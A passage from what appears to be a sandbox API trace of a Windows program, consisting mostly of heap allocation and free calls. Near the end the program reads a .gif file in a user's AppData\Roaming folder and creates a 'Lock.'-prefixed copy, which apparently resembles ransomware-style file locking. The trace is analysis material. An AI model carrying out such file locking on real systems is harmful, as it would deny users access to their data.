lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7720 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa528 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa240 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa468 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa420 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa438 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2a0 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa300 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa450 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa480 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4b0 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa270 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3c0 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3a8 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa378 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa3f0 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2e8 | out: hHeap=0x2af0000) returned 1 [0152.372] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0152.372] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0152.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0152.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa360 [0152.372] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa288 [0152.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0152.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0152.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2d0 [0152.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0152.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0152.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa510 [0152.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0152.373] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa2b8 [0152.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0152.373] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2b8 | out: hHeap=0x2af0000) returned 1 [0152.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa510 | out: hHeap=0x2af0000) returned 1 [0152.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0152.374] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0152.374] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa4f8 [0152.375] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa288 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa2d0 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4f8 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa360 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa198 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa408 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa498 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4c8 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa4e0 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aae878 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f88 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0152.375] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a69970 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c48 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78048 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa150 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.376] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0152.376] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0152.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0152.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0152.377] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0152.377] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0152.377] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0152.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0152.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0152.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0152.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0152.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0152.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0152.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0152.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0152.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0152.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0152.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0152.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0152.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0152.377] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0152.377] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0152.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0152.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0152.378] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/x_7SfFt5-eJAhmf88.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\x_7sfft5-ejahmf88.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4a4 [0152.378] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.378] SetFilePointerEx (in: hFile=0x4a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0152.378] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7020 [0152.378] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0152.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0152.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0152.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0152.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0152.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0152.379] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0152.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0152.379] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0152.379] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0152.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0152.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0152.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0152.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0152.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0152.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0152.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0152.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0152.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a08 [0152.379] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa210 [0152.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0152.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa210 | out: hHeap=0x2af0000) returned 1 [0152.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0152.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.379] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0152.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0152.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0152.380] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0152.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0152.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0152.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0152.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0152.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0152.380] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.x_7SfFt5-eJAhmf88.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.x_7sfft5-ejahmf88.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f8 [0152.380] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f00 [0152.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0152.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0152.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0152.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0152.380] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0152.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0152.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0152.381] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0152.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0152.381] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0152.381] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0152.381] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0152.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0152.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0152.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0152.381] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0152.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0152.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0152.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0152.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0152.381] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0152.381] 